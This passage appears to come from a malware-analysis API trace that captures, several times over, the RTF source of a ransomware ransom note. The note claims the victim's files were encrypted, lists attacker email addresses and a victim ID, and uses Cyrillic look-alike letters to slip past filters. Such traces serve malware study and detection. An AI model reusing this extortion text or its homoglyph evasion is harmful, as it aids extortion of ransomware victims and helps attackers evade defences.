\\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 